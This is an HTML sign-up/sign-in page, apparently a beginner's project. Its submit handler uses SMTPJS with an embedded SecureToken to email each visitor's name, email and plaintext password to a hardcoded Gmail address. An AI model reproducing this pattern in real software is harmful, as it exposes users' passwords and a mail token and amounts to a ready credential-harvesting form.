<!DOCTYPE html>
<html>
    <head>
        <meta name="veiwport" content="width=device-width, initial-scale=1.0">
        <title>signin/signup</title>
        <script src="https://kit.fontawesome.com/a30deaaa69.js" crossorigin="anonymous"></script>
        <style>
            :root{
                --norm1:#2D98A5;
                --bgclr:#B1D7D8;
                --menutxt:#000080;
                --norm:#eee;
                --white:#fff;
                --box-shadow:0 .5rem 1.5rem rgba(0,0,0,.1);
}
            *{
                margin: 0;
                padding: 0%;
                font-family: Arial, Helvetica, sans-serif;
                box-sizing: border-box;
            }
            body{
                background-color:#2D98A5;
            }
            .form-box{
                width: 90%;
                max-width: 450px;
                position: absolute;
                top: 50%;
                left: 50%;
                transform: translate(-50%,-50%);
                background: white;
                padding: 0 60px 70px;
                text-align: center;

            }
            .form-box h1{
                font-size: 30px;
                margin-bottom: 30px;
                color:#000080;
                position: relative;
                margin-top: 10px;
            }
            .form-box h1::after{
                content: ' ';
                width: 40px;
                height: 5px;
                border-radius: 3px;
                background-color:#B1D7D8;
                position: absolute;
                bottom: -12px;
                left: 50%;
                transform: translate(-50%);
            }
            .input-feild{
                background-color:#B1D7D8;
                margin: 15px 0;
                border-radius: 3px;
                display: flex;
                align-items: center;
                max-height:65px ;
                transition: max-height 0.5s;
                overflow: hidden;
            }
            input{
                width: 100%;
                background: transparent;
                border: 0;
                outline: 0;
                padding: 18px 15px;
            }
            .input-feild i{
                margin-left: 15px;
                color:#2D98A5;
            }
            form pre{
                text-align: left;
                font-size: 13px;
                color: #000080;
            }
            form pre a{
                /* text-decoration: none; */
                color:#000080;
            }
            .btn-feild{
                width: 100%;
                display: flex;
                justify-content: space-between;
            }
            .btn-feild button{
                flex-basis: 48%;
                background:#B1D7D8;
                color:#000080;
                height: 40px;
                border-radius: 20px;
                border: 0;
                outline: 0;
                cursor: pointer;
                transition: background 1s;
                text-decoration: none;
                margin-top: 1rem;
        
            }
            .input-group{
                height: 280px;
            }
            .btn-feild button.disable{
                background: lightgray;
                color: grey

            }
            .sub button{
                padding: 10px;
                background:#B1D7D8;
                color:#000080;
                font-size: 18px;
                border: 0;
                outline: none;
                cursor: pointer;
                width: 100%;
                border-radius: 30px;
                margin-top: 0px;
                margin-bottom: 0px;
            }
        </style>
    </head>
    <body>
        <div class="container">
            <div class="form-box">
                <h1 id="title">Sign Up</h1>
                <form onsubmit="sendEmail(); reset(); return false;">
                    <div class="input-group">
                        <div class="input-feild" id="namefeild">
                            <i class="fa-solid fa-user"></i>
                            <input type="text" id="Name" placeholder="name" >
                        </div>

                        <div class="input-feild">
                            <i class="fa-solid fa-envelope"></i>
                            <input type="email" id="email" placeholder="email" required>
                        </div>

                        <div class="input-feild">
                            <i class="fa-solid fa-lock"></i>
                            <input type="password" id="pwd" placeholder="password" required>
                        </div>
                        <pre>Forgot Password <a href="#click me">Click Me</pre>
                    </div>
                    <div class="sub">
                        <button type="submit" id="subcls">Submit</button>
                    </div>
                    <br>
                    <div class="btn-feild">
                        <button type="button" id="signupbtn">Sign Up</button>
                        <button type="button" class="disable" id="signinbtn">Sign In</button>
                    
                    </div>
                    </form>
            </div>
        </div>
        <script src="https://smtpjs.com/v3/smtp.js"></script>
        <script>
            function sendEmail(){
                Email.send({
    SecureToken : "0eeee2f4-d0a1-4c77-98ac-bbbd2a6a4573",
    To : 'smeiyammai@gmail.com',
    From : "smeiyammai@gmail.com",
    Subject : "Sign Up details ",
    Body : "Name: "+document.getElementById("Name").value
        +"<br> Email: " + document.getElementById("email").value
        +"<br> Password: " + document.getElementById("pwd").value
        
}).then(
  message => alert(message)
);
            }
            
        </script>
        <script>
            let signupbtn = document.getElementById("signupbtn");
            let signinbtn = document.getElementById("signinbtn");
            let title = document.getElementById("title");
            let namefeild= document.getElementById("namefeild");
            signinbtn.onclick=function(){
                namefeild.style.maxHeight="0";
                title.innerHTML="Sign In";
                signupbtn.classList.add("disable");
                signinbtn.classList.remove("disable");
            }
            signupbtn.onclick=function(){
                namefeild.style.maxHeight="60px";
                title.innerHTML="Sign Up";
                signinbtn.classList.add("disable");
                signupbtn.classList.remove("disable");
            }
            </script>
    </body>
</html>